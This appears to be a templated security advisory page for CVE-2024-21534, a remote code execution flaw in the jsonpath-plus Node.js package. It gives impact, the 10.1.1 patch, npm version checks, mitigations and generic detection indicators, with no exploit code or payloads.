CVE-2024-21534
📋 TL;DR
CVE-2024-21534 is a critical Remote Code Execution vulnerability in jsonpath-plus package affecting all versions. Attackers can execute arbitrary code on systems using vulnerable versions by exploiting improper input sanitization in the vm module. This affects any Node.js application using jsonpath-plus for JSON path evaluation.
💻 Affected Systems
- jsonpath-plus
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attacker to execute arbitrary commands, steal data, install malware, or pivot to other systems.
Likely Case
Application compromise leading to data theft, service disruption, or lateral movement within the environment.
If Mitigated
Limited impact if proper network segmentation, least privilege, and input validation are implemented.
🎯 Exploit Status
Exploitation details and payloads are publicly available in GitHub issues. Multiple bypass attempts were made in versions 10.0.0-10.1.0.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 10.1.1 and later
Vendor Advisory: https://github.com/JSONPath-Plus/JSONPath/security/advisories
Restart Required: Yes
Instructions:
1. Update jsonpath-plus to version 10.1.1 or later using npm update jsonpath-plus. 2. Restart the Node.js application. 3. Test functionality to ensure compatibility.
🔧 Temporary Workarounds
Input Validation and Sanitization
allImplement strict input validation to reject malicious JSON path expressions before processing.
Network Controls
allRestrict network access to vulnerable applications and implement WAF rules to block suspicious patterns.
🧯 If You Can't Patch
- Isolate vulnerable systems in segmented network zones with strict egress filtering
- Implement application-level allowlisting for JSON path expressions and monitor for exploitation attempts
🔍 How to Verify
Check if Vulnerable:
Check package.json or run npm list jsonpath-plus to see installed version. If version is below 10.1.1, system is vulnerable.Check Version:
npm list jsonpath-plus | grep jsonpath-plusVerify Fix Applied:
Confirm jsonpath-plus version is 10.1.1 or higher using npm list jsonpath-plus and test application functionality.📡 Detection & Monitoring
Log Indicators:
- Unusual process spawns from Node.js applications
- Error logs containing vm module exceptions
- Unexpected outbound network connections from application servers
Network Indicators:
- HTTP requests with unusual JSON path parameters
- Traffic patterns indicating command execution
SIEM Query:
source="application.logs" AND ("jsonpath-plus" OR "vm") AND ("error" OR "exception")